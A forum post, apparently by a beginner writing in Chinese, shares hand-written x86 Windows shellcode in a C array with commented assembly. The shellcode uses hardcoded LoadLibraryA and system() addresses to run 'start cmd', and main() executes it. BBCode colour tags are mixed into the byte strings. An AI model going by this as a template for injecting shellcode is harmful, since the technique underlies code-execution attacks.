1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 | unsigned char shellCode[] = "\x55"
"\x8B\xEC"
"\x83\xEC\x0C"
"\xC6\x45\xF5\x6D"
"\xC6\x45\xF6\x73"
"\xC6\x45\xF7\x76"
"\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x72"
"\xC6\x45\xFA\x74"
"\xC6\x45\xFB\x2E"
"\xC6\x45\xFC\x64"
"\xC6\x45\xFD\x6C"
"\xC6\x45\xFE\x6C"
"\xC6\x45\xFF\x00"
"\x8D\x45\xF5"
"\x50"
"[B][COLOR="red"]\xB8\xC6\x4B\x79\x76[/COLOR][/B]"
"\xFF\xD0"
"\xC6\x45\xF4\x73"
"\xC6\x45\xF5\x74"
"\xC6\x45\xF6\x61"
"\xC6\x45\xF7\x72"
"\xC6\x45\xF8\x74"
"\xC6\x45\xF9\x20"
"\xC6\x45\xFA\x63"
"\xC6\x45\xFB\x6D"
"\xC6\x45\xFC\x64"
"\xC6\x45\xFD\x00"
"\xC6\x45\xFE\x00"
"\x8D\x45\xF4"
"\x50"
"[B][COLOR="Red"]\xB8\x77\xB1\x72\x76[/COLOR][/B]"
"\xFF\xD0"
"\x58"
"\x58"
"\x83\xC4\x04"
"\x83\xC4\x0C"
"\x8B\xE5"
"\x5D";
int main()
{
((void(*)(void))shellCode)();
// __asm{
// push ebp
// mov ebp, esp
//
// sub esp, 0ch
//
// mov [ebp-0bh], 6dh ;m
// mov [ebp-0ah], 73h ;s
// mov [ebp-09h], 76h ;v
// mov [ebp-08h], 63h ;c
// mov [ebp-07h], 72h ;r
// mov [ebp-06h], 74h ;t
// mov [ebp-05h], 2eh ;.
// mov [ebp-04h], 64h ;d
// mov [ebp-03h], 6ch ;l
// mov [ebp-02h], 6ch ;l
// mov [ebp-01h], 0h ;\0
//
// lea eax, [ebp-0bh]
// push eax
// mov eax, 0x76794bc6 ;LoadLibraryA, _stdcall
// call eax
// ;pop eax
//
// mov [ebp-0ch], 73h ;s
// mov [ebp-0bh], 74h ;t
// mov [ebp-0ah], 61h ;a
// mov [ebp-09h], 72h ;r
// mov [ebp-08h], 74h ;t
// mov [ebp-07h], 20h ;
// mov [ebp-06h], 63h ;c
// mov [ebp-05h], 6dh ;m
// mov [ebp-04h], 64h ;d
// mov [ebp-03h], 0 ;\0
// mov [ebp-02h], 0h ;
// ;mov [ebp-01h], 0h ;
//
// lea eax, [ebp-0ch]
// push eax
// mov eax, 0x7672b177 ;system()
// call eax
//
// pop eax
// pop eax
// add esp, 04h
// add esp, 0ch
//
// mov esp, ebp
// pop ebp
// }
return 0;
}
|
刚入门,小学水平,自然通用是不可能的了,但总算是根据那篇语焉不详的文章弄出来这个,结果又卡在这里了!~
